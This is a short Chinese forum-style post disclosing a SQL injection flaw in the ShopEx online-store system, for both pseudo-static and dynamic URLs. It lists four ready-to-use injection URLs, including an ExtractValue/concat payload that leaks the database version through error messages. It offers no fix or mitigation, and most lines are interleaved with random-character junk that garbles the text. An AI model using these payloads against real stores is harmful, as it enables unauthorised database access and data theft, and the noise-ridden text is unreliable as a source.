注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
! u7 A" e: C* f8 W" X2 q6 t. _2 M7 `& W1 z) T
好吧,我扯远了~~
( W' C: H8 e& V$ v6 g( ^8 |其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~+ I s$ d: V0 @- f1 O
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 l! X2 a6 v3 T+ b) q5 h4 m
# W9 g7 y/ S$ U, F: U1 m& Y# yhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
9 B0 _& u. g: ]: n$ `8 L `: _2 K. u
a. l9 Y# L, ^$ G9 E$ n6 M5 Thttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html! l [% b8 B: D+ Y* `
& h; P5 _) \- @: Vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
$ R' d F' Q: E- H: n. [
: p* P8 P0 W1 q/ Ohttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
. ]3 l# u* c+ T7 `/ ?( v9 N5 Z! H+ L1 K3 d$ |6 u
; S3 E0 t1 [' m6 d# z
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
0 C, A9 U0 ]" _/ w2 F* K0 Q* e如何注入就不多说了,10多年的东西了…不会也会了…
9 h/ Q! x# m5 p ^6 d! d; s2 _
) v0 Y6 Z% {0 z; h1 C) }: V# u |